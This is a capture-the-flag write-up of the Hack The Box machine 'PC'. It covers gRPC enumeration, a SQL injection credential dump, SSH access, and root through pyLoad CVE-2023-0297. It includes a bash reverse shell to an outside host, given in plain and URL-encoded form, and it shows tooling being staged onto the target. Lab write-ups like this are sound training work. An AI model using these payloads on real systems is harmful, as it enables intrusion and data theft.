Hack The Box - PC

June 20, 2023

PC

PC is a Linux machine with an open port running gRPC (Google Remote Procedure Call). Interaction with the server using grpcui allows for the creation of a new user on the system. Interception of a POST request to the /invoke/SimpleApp.getInfo endpoint can be used to run SQLMap, resulting in a database dump of usernames and passwords which can be leveraged to SSH into the system. Further scanning using LinPEAS reveals the presence of several active ports. Viewing a page on port 8000 uncovers that the server is running pyLoad, a download manager. The version of pyLoad running on the machine is vulnerable to arbitrary code injection (CVE-2023-0297), which can be used to get a root shell.

nmap scan:

nmap scan

Open ports:

  • 22 (SSH)
  • 50051 (unknown)

I tried connecting to port 50051 with netcat which then showed these non-printable characters: ▒?��?�� ?

Eventually the connection timed out with an error message:

netcat HTTP/2 error

I did a google search for "http2 port 50051" which brought up some results related to gRPC. Then, I found that the default port for gRPC is 50051. So, I looked for a tool that could be used to interact with gRPC which led to grpcui, an interactive web UI for the gRPC protocol:

grpcui

grpc web ui

Three methods can be used on this service:

  • LoginUser
  • RegisterUser
  • getInfo

I registered a new user and logged in which provided me with an id and token. I sent a request to getInfo using the given id and token which responded with the message "Will update soon."

Then, I intercepted this request with Burp Suite to get a better idea of its structure:

burp request getInfo

Assuming that the server was using some type of SQL database, I ran sqlmap on the above request to check for SQLi. The output showed that the server was using SQLite and resulted in a database dump of usernames and passwords:

sqlmap
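To show why the getInfo request was injectable, here is an added example (not the box's own server code) of a string-built SQLite lookup beside its parameterized fix. The table name, columns and rows are constructed placeholders; the real schema is not on the page.

```python
import sqlite3


def make_db():
    # Constructed in-memory database standing in for the box's SQLite backend.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id TEXT, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("1", "alice", "placeholder-pw-1"), ("2", "sau", "placeholder-pw-2")],
    )
    conn.commit()
    return conn


def get_info_vulnerable(conn, user_id):
    # The id taken from the request is spliced into the SQL text, so
    # quotes in the value change the query itself; this is what sqlmap finds.
    sql = f"SELECT username, password FROM accounts WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()


def get_info_fixed(conn, user_id):
    # Parameter binding: the driver passes user_id as data, never as SQL.
    # Rejecting anything that is not a plain integer id adds a second layer.
    if not user_id.isdigit():
        return []
    sql = "SELECT username, password FROM accounts WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()
```

The same tautology that returns every account from the vulnerable function returns nothing from the fixed one.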

I was able to SSH into the system as user sau. This is where the user flag can be found:

user flag

Next, I started up a local python server so I could download LinPEAS on the target system:

python3 -m http.server

Downloaded LinPEAS with wget:

wget linpeas

After enumerating with LinPEAS, the most interesting results were the active ports:

linpeas active ports

I forwarded port 1234 on my machine to port 8000 on the target machine to see what was running:

port forward

This brought up a page running pyLoad:

pyLoad

I searched for "pyload vulnerability" on google, which led me to CVE-2023-0297 (Arbitrary Code Injection) on the Snyk Vulnerability DB, which also features this POC.

snyk CVE-2023-0297

The current version running on the machine is before the patch:

pyLoad version

So, I started a listener with netcat:

netcat

Then, I edited the exploit code featured in the POC to contain a URL encoded reverse shell command within the system() function.

Reverse shell command:

\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.30/9001 0>&1'\"

URL encoded:

\"%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.30%2F9001%200%3E%261%27\"

Sent the payload:

payload

Obtained a root shell:

root



Written by Mike Garrity
